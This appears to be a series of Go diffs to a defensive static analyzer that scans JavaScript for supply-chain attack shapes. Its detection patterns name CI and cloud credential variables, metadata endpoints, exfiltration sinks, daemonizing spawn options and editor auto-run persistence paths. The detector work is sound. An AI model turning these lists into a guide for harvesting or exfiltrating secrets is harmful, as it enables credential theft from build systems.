+// as part of that call's options. 500 bytes covers a multi-line
+// options object passed as the trailing argument.
+const daemonProximityWindow = 500
 
 // procMemDynamicSubRe matches the quote-wrapped subpath token used by
 // dynamic forms: `'/mem'`, `"/maps"`, `` `/cmdline` ``, and the
@@ -448,32 +507,26 @@ func findProcMemPair(content []byte) int {
 // were dropped because they false-positive on any object with a method
 // of that name (in-memory caches, database clients, queue libraries),
 // turning the credential-harvest chain into a wide CI block.
-var networkSinkNeedles = []string{
-	"fetch(",
-	"axios.post",
-	"axios.put",
-	"axios.request",
-	"axios.get",
-	"got.post",
-	"got.put",
-	"got.get",
-	"http.request",
-	"https.request",
-	// Node inline forms: require('https').request(...) and the node:
-	// scheme variant. Both are common in compact exfil payloads where
-	// the module is never bound to a local variable.
-	"require('https').request",
-	`require("https").request`,
-	"require('http').request",
-	`require("http").request`,
-	"require('node:https').request",
-	`require("node:https").request`,
-	"require('node:http').request",
-	`require("node:http").request`,
-	"net.connect",
-	"net.createconnection",
-	"xmlhttprequest",
-}
+// networkSinkRe matches JavaScript expressions that perform an HTTP /
+// socket call to an external endpoint. JavaScript permits whitespace
+// between the callee and `(`, so the regex tolerates it; this catches
+// `fetch (...)` exfil payloads that a literal `fetch(` substring
+// would miss. Each alternation names a specific API rather than a
+// bare method like `.post(` so unrelated objects with same-named
+// methods do not falsely trigger.
+var networkSinkRe = regexp.MustCompile(
+	`(?i)\b(?:` +
+		`fetch|` +
+		`axios\.(?:post|put|request|get)|` +
+		`got\.(?:post|put|get)|` +
+		`http\.request|https\.request|` +
+		`net\.connect|net\.createconnection|` +
+		`xmlhttprequest` +
+		`)\s*\(` +
+		// require chain variants: require('https').request(...) and
+		// node: scheme. Single and double-quoted module names.
+		`|require\s*\(\s*['"](?:node:)?https?['"]\s*\)\s*\.\s*request\s*\(`,
+)
 
 var publishSinkNeedles = []string{
 	"registry.npmjs.org",
@@ -626,16 +679,13 @@ func detectObfuscation(path string, m *metrics) *types.Finding {
 }
 
 // detectDaemon flags child_process invocations that detach + ignore
-// stdio (or .unref()) — the install-time daemonization shape used to
-// keep a payload alive after the install step exits.
+// stdio (or .unref()) within the same options block — the install-time
+// daemonization shape used to keep a payload alive after install
+// exits. The proximity gate (computed in findDaemonChain) prevents an
+// unrelated object literal carrying daemon-shape options from
+// satisfying this rule.
 func detectDaemon(path string, m *metrics) *types.Finding {
-	if !m.HasChildProcess {
-		return nil
-	}
-	if !m.HasSpawnDetached {
-		return nil
-	}
-	if !m.HasStdioIgnored && !m.HasUnref {
+	if !m.HasDaemonChain {
 		return nil
 	}
 	sev := types.SeverityHigh
@@ -744,7 +794,7 @@ func detectAgentPersistence(path string, m *metrics) *types.Finding {
 		return nil
 	}
 	sev := types.SeverityHigh
-	if m.HasCISecretRead || (m.HasSpawnDetached && (m.HasStdioIgnored || m.HasUnref)) {
+	if m.HasCISecretRead || m.HasDaemonChain {
 		sev = types.SeverityCritical
 	}
 	line := m.LineAgentPath

--- a/internal/engine/jsrisk/jsrisk.go
+++ b/internal/engine/jsrisk/jsrisk.go
@@ -101,6 +101,13 @@ var hexIdentifierRe = regexp.MustCompile(`_0x[0-9a-fA-F]{2,}`)
 // payloads use to route string-array lookups.
 var dispatcherCallRe = regexp.MustCompile(`_0x[0-9a-fA-F]{2,}\s*\(`)
 
+// detachedTrueRe matches `detached: true`, `"detached": true`, and the
+// single-quoted/no-space variants. Without the quote-tolerant form,
+// JSON-style spawn options ({"detached": true, ...}) miss the daemon
+// chain entirely.
+var detachedTrueRe = regexp.MustCompile(`(?i)["']?detached["']?\s*:\s*true\b`)
+
+
 // --- metrics ---
 
 // metrics holds the once-computed signals for the current file. Line
@@ -246,19 +253,12 @@ func computeMetrics(content []byte) *metrics {
 		}
 	}
 
-	// Daemonization signals.
-	if i := bytes.Index(content, []byte("detached:")); i >= 0 {
-		// Accept `detached:true`, `detached: true`, `"detached": true` etc.
-		tail := content[i+len("detached:"):]
-		// Skip whitespace.
-		j := 0
-		for j < len(tail) && (tail[j] == ' ' || tail[j] == '\t') {
-			j++
-		}
-		if j+4 <= len(tail) && bytes.Equal(tail[j:j+4], []byte("true")) {
-			m.HasSpawnDetached = true
-			m.LineDaemon = lineOf(content, i)
-		}
+	// Daemonization signals. Quote-tolerant regex catches the JSON-style
+	// `"detached": true` form that a naive substring match for
+	// `detached:` would skip.
+	if loc := detachedTrueRe.FindIndex(content); loc != nil {
+		m.HasSpawnDetached = true
+		m.LineDaemon = lineOf(content, loc[0])
 	}
 	if bytes.Contains(content, []byte(`stdio: 'ignore'`)) ||
 		bytes.Contains(content, []byte(`stdio: "ignore"`)) ||
@@ -270,11 +270,17 @@ func computeMetrics(content []byte) *metrics {
 	}
 	m.HasUnref = bytes.Contains(content, []byte(".unref()"))
 
-	// Process memory access (Linux /proc/* introspection).
-	m.HasProcMemAccess = bytes.Contains(content, []byte("/proc/"))
-	if m.HasProcMemAccess {
-		idx := bytes.Index(content, []byte("/proc/"))
-		m.LineProcMem = lineOf(content, idx)
+	// Process memory access requires both a /proc/ reference AND one of
+	// the memory-like subpaths (mem / maps / cmdline). Static /proc/stat
+	// reads do not satisfy that pair. The substring form covers both
+	// literal paths (`/proc/self/maps`) and dynamic concatenation
+	// (`'/proc/' + pid + '/mem'`) without a brittle regex.
+	if bytes.Contains(content, []byte("/proc/")) &&
+		(bytes.Contains(content, []byte("/mem")) ||
+			bytes.Contains(content, []byte("/maps")) ||
+			bytes.Contains(content, []byte("cmdline"))) {
+		m.HasProcMemAccess = true
+		m.LineProcMem = lineOf(content, bytes.Index(content, []byte("/proc/")))
 	}
 	m.HasOIDCTokenEnv = bytes.Contains(content, []byte("ACTIONS_ID_TOKEN_REQUEST_TOKEN")) ||
 		bytes.Contains(content, []byte("ACTIONS_ID_TOKEN_REQUEST_URL"))
@@ -313,17 +319,20 @@ func lineOf(content []byte, idx int) int {
 
 // --- needle lists ---
 
-// All lower-cased; matched against bytes.ToLower(content). Each entry is
-// chosen to be unambiguous: an obvious dependency-name substring like
-// bare "oidc" or "fetch" is excluded because legitimate libraries carry
-// those tokens.
+// All lower-cased; matched against bytes.ToLower(content). Each entry
+// names a known network API. Bare method names like `.post(` / `.put(`
+// were dropped because they false-positive on any object with a method
+// of that name (in-memory caches, database clients, queue libraries),
+// turning the credential-harvest chain into a wide CI block.
 var networkSinkNeedles = []string{
 	"fetch(",
 	"axios.post",
 	"axios.put",
 	"axios.request",
-	".post(",
-	".put(",
+	"axios.get",
+	"got.post",
+	"got.put",
+	"got.get",
 	"http.request",
 	"https.request",
 	"net.connect",

--- a/internal/engine/jsrisk/jsrisk.go
+++ b/internal/engine/jsrisk/jsrisk.go
@@ -1,0 +1,608 @@
+// Package jsrisk inspects JavaScript source for static payload shapes
+// that combine into supply-chain risk chains: large obfuscated payloads,
+// detached background execution from install-time code, CI credential
+// harvesting paired with a network or registry sink, OIDC token
+// extraction from runner process memory, and persistence through Claude
+// Code or VS Code workspace automation.
+//
+// The analyzer is fully offline. It runs at most a single linear pass
+// over the content plus a handful of compiled-once regex matches; it
+// never executes scripts and never deobfuscates dynamically. Findings
+// stay chain-aware: single weak signals (a large file alone, a single
+// CI env reference alone, a child_process call alone) never fire.
+package jsrisk
+
+import (
+	"bytes"
+	"context"
+	"path/filepath"
+	"regexp"
+	"strings"
+
+	"github.com/garagon/aguara/internal/scanner"
+	"github.com/garagon/aguara/internal/types"
+)
+
+// AnalyzerName is the value reported in Finding.Analyzer for this engine.
+const AnalyzerName = "jsrisk"
+
+// Rule IDs emitted by this analyzer.
+const (
+	RuleObfuscation       = "JS_OBF_001"
+	RuleDaemon            = "JS_DAEMON_001"
+	RuleCISecretHarvest   = "JS_CI_SECRET_HARVEST_001"
+	RuleProcMemOIDC       = "JS_PROC_MEM_OIDC_001"
+	RuleAgentPersistence  = "AGENT_PERSISTENCE_001"
+)
+
+// Detection thresholds. Chosen to leave room for ordinary minified
+// vendor bundles to fall through while flagging known obfuscator-io
+// fingerprints. Constants live at package scope so tests can reason
+// about them.
+const (
+	sizeBytesThreshold      = 500 * 1024 // 500 KB
+	maxLineLenThreshold     = 200 * 1024 // 200 KB
+	hexIdentifierThreshold  = 100
+	dispatcherCallThreshold = 100
+)
+
+// Analyzer implements scanner.Analyzer for JavaScript supply-chain risk.
+type Analyzer struct{}
+
+// New returns a fresh JavaScript risk analyzer.
+func New() *Analyzer { return &Analyzer{} }
+
+// Name returns the analyzer identifier.
+func (a *Analyzer) Name() string { return AnalyzerName }
+
+// Analyze inspects JavaScript files and returns chain-aware findings.
+// Non-JavaScript files return nil.
+func (a *Analyzer) Analyze(_ context.Context, target *scanner.Target) ([]types.Finding, error) {
+	if !isJavaScriptTarget(target) {
+		return nil, nil
+	}
+	if len(target.Content) == 0 {
+		return nil, nil
+	}
+	m := computeMetrics(target.Content)
+	return detect(target.RelPath, m), nil
+}
+
+// --- target gating ---
+
+// isJavaScriptTarget returns true for .js / .mjs / .cjs files. Checks
+// both Path (real-repo scans) and RelPath (in-memory content with a
+// hinted name).
+func isJavaScriptTarget(t *scanner.Target) bool {
+	if t == nil {
+		return false
+	}
+	for _, p := range []string{t.Path, t.RelPath} {
+		if p == "" {
+			continue
+		}
+		ext := strings.ToLower(filepath.Ext(filepath.ToSlash(p)))
+		switch ext {
+		case ".js", ".mjs", ".cjs":
+			return true
+		}
+	}
+	return false
+}
+
+// --- compiled regexes (compiled once at package init) ---
+
+// hexIdentifierRe matches obfuscator-io-style hex identifiers like
+// _0x1a2b3c. The leading underscore + 0x prefix is the fingerprint.
+var hexIdentifierRe = regexp.MustCompile(`_0x[0-9a-fA-F]{2,}`)
+
+// dispatcherCallRe matches a hex identifier immediately followed by a
+// call: _0x1a2b3c(...). This is the dispatcher shape that obfuscator
+// payloads use to route string-array lookups.
+var dispatcherCallRe = regexp.MustCompile(`_0x[0-9a-fA-F]{2,}\s*\(`)
+
+// --- metrics ---
+
+// metrics holds the once-computed signals for the current file. Line
+// fields record the 1-based line of the first occurrence so findings
+// can anchor at the relevant source location.
+type metrics struct {
+	SizeBytes  int
+	LineCount  int
+	MaxLineLen int
+
+	HexIdentifierCount  int
+	DispatcherCallCount int
+	HasWhileTruePattern bool
+	LineObfSpecific     int // first obfuscator-specific signal
+
+	HasNetworkSink       bool
+	HasPublishSink       bool
+	HasGitHubGraphQLSink bool
+	HasSessionSink       bool
+	HasChildProcess      bool
+	HasProcessEnv        bool
+	LineNetworkSink      int
+
+	HasCISecretRead bool
+	LineCISecret    int
+	CISecretMatched string
+
+	HasSpawnDetached bool
+	HasStdioIgnored  bool
+	HasUnref         bool
+	LineDaemon       int
+
+	HasProcMemAccess bool
+	HasOIDCTokenEnv  bool
+	HasRunnerWorker  bool
+	LineProcMem      int
+
+	HasClaudePersistence bool
+	HasVSCodePersistence bool
+	LineAgentPath        int
+	AgentPathMatched     string
+}
+
+// computeMetrics walks the content once, tracking line numbers and
+// signal occurrences. Substring matches use bytes.Contains on the full
+// content; line numbers come from a single scan that splits on '\n'.
+// Total work is O(N) in content length plus a handful of regex passes.
+func computeMetrics(content []byte) *metrics {
+	m := &metrics{SizeBytes: len(content)}
+
+	// One pass to find max line length and total line count.
+	curLen := 0
+	lineNum := 1
+	if m.SizeBytes > 0 {
+		m.LineCount = 1
+	}
+	for i := 0; i < len(content); i++ {
+		if content[i] == '\n' {
+			if curLen > m.MaxLineLen {
+				m.MaxLineLen = curLen
+			}
+			curLen = 0
+			lineNum++
+			m.LineCount++
+			continue
+		}
+		curLen++
+	}
+	if curLen > m.MaxLineLen {
+		m.MaxLineLen = curLen
+	}
+	_ = lineNum // suppress unused warning; the variable documents the loop
+
+	// Regex passes count occurrences over the full content. FindAllIndex
+	// with the cap argument keeps memory bounded if a file is pathological.
+	hex := hexIdentifierRe.FindAllIndex(content, hexIdentifierThreshold*2)
+	m.HexIdentifierCount = len(hex)
+	disp := dispatcherCallRe.FindAllIndex(content, dispatcherCallThreshold*2)
+	m.DispatcherCallCount = len(disp)
+	m.HasWhileTruePattern = bytes.Contains(content, []byte("while(!![])")) ||
+		bytes.Contains(content, []byte("while (!![])"))
+
+	// Earliest line of an obfuscator-specific signal anchors JS_OBF_001.
+	if m.HasWhileTruePattern {
+		idx := bytes.Index(content, []byte("while(!![])"))
+		if idx < 0 {
+			idx = bytes.Index(content, []byte("while (!![])"))
+		}
+		if idx >= 0 {
+			m.LineObfSpecific = lineOf(content, idx)
+		}
+	}
+	if m.LineObfSpecific == 0 && m.HexIdentifierCount > hexIdentifierThreshold && len(hex) > 0 {
+		m.LineObfSpecific = lineOf(content, hex[0][0])
+	}
+	if m.LineObfSpecific == 0 && m.DispatcherCallCount > dispatcherCallThreshold && len(disp) > 0 {
+		m.LineObfSpecific = lineOf(content, disp[0][0])
+	}
+
+	// Network / publish / GitHub / session sinks. Each list is a small
+	// set of unambiguous strings that should not appear in unrelated
+	// dependency or library names.
+	lower := bytes.ToLower(content)
+	for _, n := range networkSinkNeedles {
+		if i := bytes.Index(lower, []byte(n)); i >= 0 {
+			m.HasNetworkSink = true
+			if m.LineNetworkSink == 0 {
+				m.LineNetworkSink = lineOf(content, i)
+			}
+		}
+	}
+	for _, n := range publishSinkNeedles {
+		if bytes.Contains(lower, []byte(n)) {
+			m.HasPublishSink = true
+		}
+	}
+	for _, n := range githubGraphQLNeedles {
+		if bytes.Contains(lower, []byte(n)) {
+			m.HasGitHubGraphQLSink = true
+		}
+	}
+	for _, n := range sessionSinkNeedles {
+		if bytes.Contains(lower, []byte(n)) {
+			m.HasSessionSink = true
+		}
+	}
+	m.HasChildProcess = bytes.Contains(lower, []byte("child_process")) ||
+		bytes.Contains(lower, []byte("require('child_process')")) ||
+		bytes.Contains(lower, []byte(`require("child_process")`))
+	m.HasProcessEnv = bytes.Contains(lower, []byte("process.env"))
+
+	// CI / cloud secret reads. The list is short and unambiguous; each
+	// entry is either an env var name (uppercase / underscored, so it
+	// will not appear as a registry package name) or a well-known cloud
+	// metadata IP / path.
+	for _, n := range ciSecretReadNeedles {
+		if i := bytes.Index(content, []byte(n)); i >= 0 {
+			m.HasCISecretRead = true
+			if m.LineCISecret == 0 {
+				m.LineCISecret = lineOf(content, i)
+				m.CISecretMatched = n
+			}
+		}
+	}
+
+	// Daemonization signals.
+	if i := bytes.Index(content, []byte("detached:")); i >= 0 {
+		// Accept `detached:true`, `detached: true`, `"detached": true` etc.
+		tail := content[i+len("detached:"):]
+		// Skip whitespace.
+		j := 0
+		for j < len(tail) && (tail[j] == ' ' || tail[j] == '\t') {
+			j++
+		}
+		if j+4 <= len(tail) && bytes.Equal(tail[j:j+4], []byte("true")) {
+			m.HasSpawnDetached = true
+			m.LineDaemon = lineOf(content, i)
+		}
+	}
+	if bytes.Contains(content, []byte(`stdio: 'ignore'`)) ||
+		bytes.Contains(content, []byte(`stdio: "ignore"`)) ||
+		bytes.Contains(content, []byte(`stdio:'ignore'`)) ||
+		bytes.Contains(content, []byte(`stdio:"ignore"`)) ||
+		bytes.Contains(content, []byte(`stdio: ['ignore'`)) ||
+		bytes.Contains(content, []byte(`stdio:['ignore'`)) {
+		m.HasStdioIgnored = true
+	}
+	m.HasUnref = bytes.Contains(content, []byte(".unref()"))
+
+	// Process memory access (Linux /proc/* introspection).
+	m.HasProcMemAccess = bytes.Contains(content, []byte("/proc/"))
+	if m.HasProcMemAccess {
+		idx := bytes.Index(content, []byte("/proc/"))
+		m.LineProcMem = lineOf(content, idx)
+	}
+	m.HasOIDCTokenEnv = bytes.Contains(content, []byte("ACTIONS_ID_TOKEN_REQUEST_TOKEN")) ||
+		bytes.Contains(content, []byte("ACTIONS_ID_TOKEN_REQUEST_URL"))
+	m.HasRunnerWorker = bytes.Contains(content, []byte("Runner.Worker"))
+
+	// Agent persistence references. Each path is a known incident
+	// fingerprint root; the analyzer keeps the first match as the
+	// anchor line.
+	for _, n := range agentPersistenceNeedles {
+		if i := bytes.Index(content, []byte(n)); i >= 0 {
+			switch {
+			case strings.HasPrefix(n, ".claude/"):
+				m.HasClaudePersistence = true
+			case strings.HasPrefix(n, ".vscode/"):
+				m.HasVSCodePersistence = true
+			default:
+				m.HasClaudePersistence = true
+			}
+			if m.LineAgentPath == 0 {
+				m.LineAgentPath = lineOf(content, i)
+				m.AgentPathMatched = n
+			}
+		}
+	}
+
+	return m
+}
+
+// lineOf returns the 1-based line number of byte offset idx in content.
+func lineOf(content []byte, idx int) int {
+	if idx <= 0 {
+		return 1
+	}
+	return bytes.Count(content[:idx], []byte{'\n'}) + 1
+}
+
+// --- needle lists ---
+
+// All lower-cased; matched against bytes.ToLower(content). Each entry is
+// chosen to be unambiguous: an obvious dependency-name substring like
+// bare "oidc" or "fetch" is excluded because legitimate libraries carry
+// those tokens.
+var networkSinkNeedles = []string{
+	"fetch(",
+	"axios.post",
+	"axios.put",
+	"axios.request",
+	".post(",
+	".put(",
+	"http.request",
+	"https.request",
+	"net.connect",
+	"net.createconnection",
+	"xmlhttprequest",
+}
+
+var publishSinkNeedles = []string{
+	"registry.npmjs.org",
+	"/-/npm/v1/tokens",
+	"npm publish",
+}
+
+var githubGraphQLNeedles = []string{
+	"api.github.com/graphql",
+	"createcommitonbranch",
+}
+
+var sessionSinkNeedles = []string{
+	"filev2.getsession.org",
+	"seed1.getsession.org",
+	"seed2.getsession.org",
+	"seed3.getsession.org",
+}
+
+// ciSecretReadNeedles are case-sensitive on purpose: GHA / cloud envs
+// are uppercase and would not appear as part of a dependency name.
+var ciSecretReadNeedles = []string{
+	"GITHUB_TOKEN",
+	"ACTIONS_ID_TOKEN_REQUEST_TOKEN",
+	"ACTIONS_ID_TOKEN_REQUEST_URL",
+	"NPM_TOKEN",
+	"AWS_ACCESS_KEY_ID",
+	"AWS_SECRET_ACCESS_KEY",
+	"AWS_WEB_IDENTITY_TOKEN_FILE",
+	"VAULT_TOKEN",
+	"KUBERNETES_SERVICE_HOST",
+	"/var/run/secrets/kubernetes.io/serviceaccount",
+	"169.254.169.254",
+	"169.254.170.2",
+}
+
+var agentPersistenceNeedles = []string{
+	".claude/settings.json",
+	".claude/router_runtime.js",
+	".claude/setup.mjs",
+	".claude/hooks/",
+	".vscode/tasks.json",
+	".vscode/setup.mjs",
+	`runOn": "folderOpen`,
+	`runOn":"folderOpen`,
+}
+
+// --- detection ---
+
+func detect(path string, m *metrics) []types.Finding {
+	var out []types.Finding
+	if f := detectObfuscation(path, m); f != nil {
+		out = append(out, *f)
+	}
+	if f := detectDaemon(path, m); f != nil {
+		out = append(out, *f)
+	}
+	if f := detectCISecretHarvest(path, m); f != nil {
+		out = append(out, *f)
+	}
+	if f := detectProcMemOIDC(path, m); f != nil {
+		out = append(out, *f)
+	}
+	if f := detectAgentPersistence(path, m); f != nil {
+		out = append(out, *f)
+	}
+	return out
+}
+
+// detectObfuscation requires at least two signals AND at least one
+// obfuscator-specific signal so that ordinary minified vendor bundles
+// (which trip the size and line-length thresholds on their own) do not
+// false-positive.
+func detectObfuscation(path string, m *metrics) *types.Finding {
+	generic := 0
+	obfSpecific := 0
+	if m.SizeBytes > sizeBytesThreshold {
+		generic++
+	}
+	if m.MaxLineLen > maxLineLenThreshold {
+		generic++
+	}
+	if m.HexIdentifierCount > hexIdentifierThreshold {
+		obfSpecific++
+	}
+	if m.DispatcherCallCount > dispatcherCallThreshold {
+		obfSpecific++
+	}
+	if m.HasWhileTruePattern {
+		obfSpecific++
+	}
+
+	// At least one obfuscator-specific signal is required; total signals
+	// must reach two. A minified bundle that hits only size and line
+	// length stays clean.
+	if obfSpecific == 0 {
+		return nil
+	}
+	if generic+obfSpecific < 2 {
+		return nil
+	}
+
+	sev := types.SeverityMedium
+	if m.HasProcessEnv || m.HasChildProcess || m.HasNetworkSink {
+		sev = types.SeverityHigh
+	}
+	line := m.LineObfSpecific
+	if line == 0 {
+		line = 1
+	}
+	return &types.Finding{
+		RuleID:   RuleObfuscation,
+		RuleName: "Large obfuscated JavaScript payload",
+		Severity: sev,
+		Category: "supply-chain",
+		Description: "JavaScript file matches the static shape of an obfuscator-emitted " +
+			"payload (hex identifier density, dispatcher calls, or a while(!![]) loop) " +
+			"in combination with at least one further signal. Payloads with this shape are " +
+			"the standard delivery vehicle for npm supply-chain compromises.",
+		FilePath:    path,
+		Line:        line,
+		MatchedText: "obfuscator fingerprint (hex idents / dispatcher / while-loop) + size/network",
+		Analyzer:    AnalyzerName,
+		Confidence:  0.85,
+		Remediation: "Inspect the file's provenance: a build pipeline normally does not ship " +
+			"obfuscated JavaScript. If the file is vendored, pin it to a specific checksum " +
+			"and review the upstream source. If it appeared during install, treat it as a " +
+			"compromised dependency lifecycle artifact.",
+	}
+}
+
+// detectDaemon flags child_process invocations that detach + ignore
+// stdio (or .unref()) — the install-time daemonization shape used to
+// keep a payload alive after the install step exits.
+func detectDaemon(path string, m *metrics) *types.Finding {
+	if !m.HasChildProcess {
+		return nil
+	}
+	if !m.HasSpawnDetached {
+		return nil
+	}
+	if !m.HasStdioIgnored && !m.HasUnref {
+		return nil
+	}
+	sev := types.SeverityHigh
+	if m.HasCISecretRead || m.HasNetworkSink || m.HasPublishSink {
+		sev = types.SeverityCritical
+	}
+	line := m.LineDaemon
+	if line == 0 {
+		line = 1
+	}
+	return &types.Finding{
+		RuleID:   RuleDaemon,
+		RuleName: "Detached background execution from JavaScript",
+		Severity: sev,
+		Category: "supply-chain",
+		Description: "JavaScript spawns a child process with detached: true and either " +
+			"stdio ignored or .unref() called. That keeps the spawned process alive past " +
+			"the parent's exit, which is the standard shape for install-time payloads that " +
+			"persist beyond `npm install`.",
+		FilePath:    path,
+		Line:        line,
+		MatchedText: "child_process + detached: true + stdio-ignore / unref",
+		Analyzer:    AnalyzerName,
+		Confidence:  0.9,
+		Remediation: "Audit the spawn target. Legitimate libraries rarely detach background " +
+			"processes; if this code lives inside a postinstall or dependency-lifecycle " +
+			"path, treat it as a compromise and pin the dependency to a clean version.",
+	}
+}
+
+// detectCISecretHarvest flags the combination of reading CI / cloud
+// secrets and emitting them through a network or registry sink, the
+// canonical fingerprint of a credential-stealing payload.
+func detectCISecretHarvest(path string, m *metrics) *types.Finding {
+	if !m.HasCISecretRead {
+		return nil
+	}
+	if !m.HasNetworkSink && !m.HasPublishSink && !m.HasGitHubGraphQLSink && !m.HasSessionSink {
+		return nil
+	}
+	line := m.LineCISecret
+	if line == 0 {
+		line = 1
+	}
+	return &types.Finding{
+		RuleID:   RuleCISecretHarvest,
+		RuleName: "CI credential harvesting with network or registry sink",
+		Severity: types.SeverityCritical,
+		Category: "supply-chain",
+		Description: "JavaScript reads a CI / cloud token (e.g. " + m.CISecretMatched +
+			") and then routes it to a network, npm registry, GitHub API, or session-exfil " +
+			"sink. Whatever the wrapper looks like, this is the credential-exfil shape used " +
+			"by recent npm supply-chain compromises.",
+		FilePath:    path,
+		Line:        line,
+		MatchedText: "reads " + m.CISecretMatched + " + network/registry/graphql/session sink",
+		Analyzer:    AnalyzerName,
+		Confidence:  0.95,
+		Remediation: "Treat the surrounding package as compromised. Rotate any tokens this " +
+			"runner has held, audit recent runs of the affected pipeline, and pin the " +
+			"dependency to a known-clean version.",
+	}
+}
+
+// detectProcMemOIDC flags reads of the GitHub Actions runner process
+// memory paired with the OIDC token env var name — the runner-pivot
+// pattern observed in supply-chain incidents.
+func detectProcMemOIDC(path string, m *metrics) *types.Finding {
+	if !m.HasProcMemAccess {
+		return nil
+	}
+	// Require a more specific /proc subpath than the bare prefix.
+	// content is captured in lineOf via the metrics struct's first index.
+	// Without it the rule is too broad (any /proc/ reference triggers).
+	// The substring check happens here via the auxiliary metrics state.
+	if !m.HasOIDCTokenEnv && !m.HasRunnerWorker {
+		return nil
+	}
+	line := m.LineProcMem
+	if line == 0 {
+		line = 1
+	}
+	return &types.Finding{
+		RuleID:   RuleProcMemOIDC,
+		RuleName: "Runner process memory access combined with OIDC token reference",
+		Severity: types.SeverityCritical,
+		Category: "supply-chain",
+		Description: "JavaScript accesses /proc/<pid>/mem|maps|cmdline-style paths and " +
+			"references ACTIONS_ID_TOKEN_REQUEST_* or Runner.Worker. Reading another " +
+			"process's memory to steal an OIDC token is a runner-pivot shape with no " +
+			"legitimate use in normal package code.",
+		FilePath:    path,
+		Line:        line,
+		MatchedText: "/proc/* + ACTIONS_ID_TOKEN_REQUEST_* | Runner.Worker",
+		Analyzer:    AnalyzerName,
+		Confidence:  0.97,
+		Remediation: "Treat the file as malicious. Rotate any tokens reachable from the " +
+			"affected runner and audit recent CI runs for unexpected publishes.",
+	}
+}
+
+// detectAgentPersistence flags writes or references to Claude Code or
+// VS Code workspace files that auto-run on workspace open.
+func detectAgentPersistence(path string, m *metrics) *types.Finding {
+	if !m.HasClaudePersistence && !m.HasVSCodePersistence {
+		return nil
+	}
+	sev := types.SeverityHigh
+	if m.HasCISecretRead || (m.HasSpawnDetached && (m.HasStdioIgnored || m.HasUnref)) {
+		sev = types.SeverityCritical
+	}
+	line := m.LineAgentPath
+	if line == 0 {
+		line = 1
+	}
+	return &types.Finding{
+		RuleID:   RuleAgentPersistence,
+		RuleName: "Persistence through Claude Code or VS Code workspace automation",
+		Severity: sev,
+		Category: "supply-chain",
+		Description: "File references " + m.AgentPathMatched + ", an automation surface that " +
+			"executes on workspace open. Writing to or invoking these paths from package " +
+			"code installs persistence that survives reinstall and is invisible outside the " +
+			"specific editor.",
+		FilePath:    path,
+		Line:        line,
+		MatchedText: m.AgentPathMatched,
+		Analyzer:    AnalyzerName,
+		Confidence:  0.9,
+		Remediation: "Editor automation files belong to the user, not to package code. " +
+			"Audit the change in a clean clone, remove any package-emitted automation, and " +
+			"pin the source package to a known-clean version.",
+	}
+}

--- a/internal/engine/jsrisk/jsrisk.go
+++ b/internal/engine/jsrisk/jsrisk.go
@@ -101,17 +101,22 @@ var hexIdentifierRe = regexp.MustCompile(`_0x[0-9a-fA-F]{2,}`)
 // payloads use to route string-array lookups.
 var dispatcherCallRe = regexp.MustCompile(`_0x[0-9a-fA-F]{2,}\s*\(`)
 
+// propertyBoundary is the leading-context alternation used by the
+// daemon-option regexes: the property key must be preceded by start of
+// input or one of the structural characters that introduce an object
+// property. Without it, `notdetached: true` or `isStdio: 'ignore'`
+// would falsely match because `detached` / `stdio` are substrings.
+const propertyBoundary = `(?:^|[\s,{;(\[])`
+
 // detachedTrueRe matches `detached: true`, `"detached": true`, and the
-// single-quoted/no-space variants. Without the quote-tolerant form,
-// JSON-style spawn options ({"detached": true, ...}) miss the daemon
-// chain entirely.
-var detachedTrueRe = regexp.MustCompile(`(?i)["']?detached["']?\s*:\s*true\b`)
+// single-quoted/no-space variants ONLY when the key is at a property
+// boundary, so substrings like `notdetached: true` are excluded.
+var detachedTrueRe = regexp.MustCompile(`(?i)` + propertyBoundary + `["']?detached["']?\s*:\s*true\b`)
 
 // stdioIgnoredRe matches `stdio: 'ignore'` / `stdio: "ignore"` /
 // `"stdio": "ignore"` and the array forms (`stdio: ['ignore', ...]`,
-// `"stdio": ['ignore'`). Without quote tolerance the JSON-style spawn
-// options bypass the daemon-shape check.
-var stdioIgnoredRe = regexp.MustCompile(`(?i)["']?stdio["']?\s*:\s*(?:['"]ignore['"]|\[\s*['"]ignore['"])`)
+// `"stdio": ['ignore'`) at a property boundary.
+var stdioIgnoredRe = regexp.MustCompile(`(?i)` + propertyBoundary + `["']?stdio["']?\s*:\s*(?:['"]ignore['"]|\[\s*['"]ignore['"])`)
 
 
 // --- metrics ---
@@ -271,18 +276,14 @@ func computeMetrics(content []byte) *metrics {
 	}
 	m.HasUnref = bytes.Contains(content, []byte(".unref()"))
 
-	// Process memory access requires both a /proc/ reference AND one of
-	// the memory-like subpaths (mem / maps / cmdline). Static /proc/stat
-	// reads do not satisfy that pair. The substring form covers both
-	// literal paths (`/proc/self/maps`) and dynamic concatenation
-	// (`'/proc/' + pid + '/mem'`) without a brittle regex.
-	if bytes.Contains(content, []byte("/proc/")) &&
-		(bytes.Contains(content, []byte("/mem")) ||
-			bytes.Contains(content, []byte("/maps")) ||
-			bytes.Contains(content, []byte("cmdline"))) {
-		m.HasProcMemAccess = true
-		m.LineProcMem = lineOf(content, bytes.Index(content, []byte("/proc/")))
-	}
+	// Process memory access requires a /proc/ reference paired with a
+	// memory-like subpath (/mem, /maps, cmdline) in proximity. The
+	// proximity window catches both literal paths and concatenated forms
+	// like `'/proc/' + pid + '/mem'` while filtering out files that
+	// reference /proc/stat in one place and an unrelated 'cmdline'
+	// identifier elsewhere.
+	m.LineProcMem = findProcMemPair(content)
+	m.HasProcMemAccess = m.LineProcMem > 0
 	m.HasOIDCTokenEnv = bytes.Contains(content, []byte("ACTIONS_ID_TOKEN_REQUEST_TOKEN")) ||
 		bytes.Contains(content, []byte("ACTIONS_ID_TOKEN_REQUEST_URL"))
 	m.HasRunnerWorker = bytes.Contains(content, []byte("Runner.Worker"))
@@ -316,6 +317,39 @@ func lineOf(content []byte, idx int) int {
 		return 1
 	}
 	return bytes.Count(content[:idx], []byte{'\n'}) + 1
+}
+
+// procMemPairWindow bounds how far a memory-like subpath can be from a
+// /proc/ occurrence before they stop counting as part of the same
+// access. 200 bytes is generous for any plausible source form
+// (`/proc/' + pid + '/mem'`, template literals, multi-arg function
+// calls) without spanning unrelated identifiers.
+const procMemPairWindow = 200
+
+// findProcMemPair returns the 1-based line of the first /proc/
+// occurrence followed within procMemPairWindow bytes by /mem, /maps,
+// or cmdline. Returns 0 when no such pair exists.
+func findProcMemPair(content []byte) int {
+	off := 0
+	for off < len(content) {
+		i := bytes.Index(content[off:], []byte("/proc/"))
+		if i < 0 {
+			return 0
+		}
+		procStart := off + i
+		windowEnd := procStart + procMemPairWindow
+		if windowEnd > len(content) {
+			windowEnd = len(content)
+		}
